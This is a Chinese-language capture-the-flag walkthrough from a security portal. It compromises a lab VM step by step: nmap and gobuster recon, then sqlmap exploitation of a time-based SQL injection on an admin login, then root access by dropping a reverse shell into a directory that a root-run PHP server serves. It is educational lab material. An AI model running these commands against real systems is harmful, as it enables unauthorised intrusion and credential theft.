官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
前言
本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!
信息收集阶段
靶机:192.168.1.128
Kali攻击机:192.168.1.102
目标:user权限和root权限
nmap -sn 192.168.1.0/24
nmap -A -p1-65535 192.168.1.102
开启了80端口和65535端口:
根据信息,可见65535端口就是对应22端口,SSH的端口被修改给65535端口!
漏洞利用阶段
http://192.168.1.102/访问下看看:
一个用户:ShellDredd!
查看下源代码:
<div class="container">
<span class="title">404 Not Found</span>
<p>
A wild 404-PAGE appeared!<br>
This means that the your browser was able to communicate with your given server, but the server could not find
what was requested.<br><br>
* Make sure the url is correct.<br>
* Don't panic.
</p>
<div>Press any key to continue _</div>
</div>
</div>
这意味着你的浏览器可以与指定的服务器通信,但是你请求的服务器找不到了!
确认url是正确的!别灰心!
接下来,我们扫描下目录!!
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.102/ -x bak,txt,html,php,log
访问下:
接着再一层目录扫描:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.102/shop/ -x bak,txt,html,php,log
访问下这个地址:一个登录界面!
http://192.168.1.102/shop/administrator/
经测试,该界面存在基于时间的sql注入!
执行后,页面的加载位置会一致出去加载状态!!证明确实存在漏洞!!
这里我们采用sqlmap跑一下!
sqlmap /usr/share/sqlmap/sqlmap.py -u http://192.168.1.102/shop/administrator/ --forms --technique=T --current-db --batch
这里我们介绍一个参数:--forms
直接使用--forms参数,sqlmap会自动从-u中的url获取页面中的表单进行测试,对应本次对应的登录框!!
当前的库名称是Webapp,爆表!
sqlmap /usr/share/sqlmap/sqlmap.py -u http://192.168.1.102/shop/administrator/ --forms --technique=T -D Webapp --tables --batch
爆列!
用户名和密码,爆值!
根据账户名和密码尝试web页面和ssh登录!!
这个账户可以登录!
第一个flag:
cat user.txt
gHyrSk****************CoCFnkD
权限提升阶段
只有这两个账户,接下来就是提权到root了!!
上传提权脚本!
搜索结果:我们发现root运行过一个可疑的程序!
php -S 127.0.0.1:65000 -t /dev/shm/
我们查询下这个命令具体的意思:
-S <addr>:<port> Run with built-in web server.
-t <docroot> Specify document root <docroot> for built-in web server.
运行一个WEB服务器,该服务器根目录为/dev/shm/!!!
我们这里的思路是在该目录下上传一个反弹shell!
然后在本地访问这个目录下的地址!!LINUX下的访问!
然后再kali下监听端口!得到root的权限!!!
反弹shell地址:https://www.revshells.com/
最后的flag:
cat /root/root.txt
VZqLowpLd6******************9Ur0OAz